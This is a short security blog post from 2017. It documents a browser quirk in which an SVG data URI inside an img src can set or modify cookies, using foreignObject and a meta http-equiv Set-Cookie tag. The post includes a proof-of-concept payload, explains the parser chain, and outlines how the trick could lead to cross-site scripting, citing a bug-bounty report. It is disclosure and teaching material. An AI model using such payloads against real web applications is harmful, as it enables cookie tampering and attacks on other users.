dr4cun0 > Home

Curious Case of Benjamin Cookie

TLDR : <img src="data:image/svg+xml,...http-equiv='Set-Cookie'..."> can create/modify cookies

!! This payload shall not work anymore.
Link - https://tools.ietf.org/html/draft-ietf-httpstate-cookie-14
Last check :
Date : Mar 17th 2017
Browser tested : Firefox/51.0
User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0

POC :

<img src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'>
<circle r='100'></circle>
<foreignObject>
<html xmlns='http://www.w3.org/1999/xhtml'>
<meta http-equiv='Set-Cookie' content='ppp=qqq' />
</html>
</foreignObject>
</svg>">

Link : https://dr4cun0.com/POCs/bc.html

src attribute in img tag invokes XML parser when .svg file is loaded.

Example : <img src="cookie.svg">

This shall invoke XML parser and contents of the file cookie.svg shall be rendered upon validating the XML syntax.

SVG element 'foreignObject' then invokes HTML parser and renders the content of the element as HTML

The foreignObject SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

This allows HTML to be rendered inside`src` attribute of img tag, but JavaScript parsers are absolutely prohibited to this attribute therefore any script included in the HTML content shall not be executed.

meta HTML element is rendered by the HTML parser successfully though, attribute http-equiv can then be used to simulate HTTP response header with allowed headers :

  1. content-language
  2. content-security-policy
  3. content-type
  4. refresh
  5. set-cookie

set-cookie is then used to set or modify cookie.

<meta http-equiv='Set-Cookie' content='ppp=qqq' />

Connecting above steps :

<svg xmlns='http://www.w3.org/2000/svg'>
<circle r='100'></circle>
<foreignObject>
<html xmlns='http://www.w3.org/1999/xhtml'>
<meta http-equiv='Set-Cookie' content='ppp=qqq' />
</html>
</foreignObject>
</svg>

Therefore if a web application does not validate the image URL and attacker has ability to enter arbitrary string, this can be allow creating new cookies, or modifying existing cookies.

Exploitable scenario : Web application fetches value of cookie 'username' and injects it into DOM without sanitization, here if 'username' cookie can be modified to XSS payload it can then lead to JavaScript execution at other users' browser

Reported vulnerability :

  1. https://hackerone.com/reports/213991

Screen_Shot_2017-03-17_at_12.58.20_AM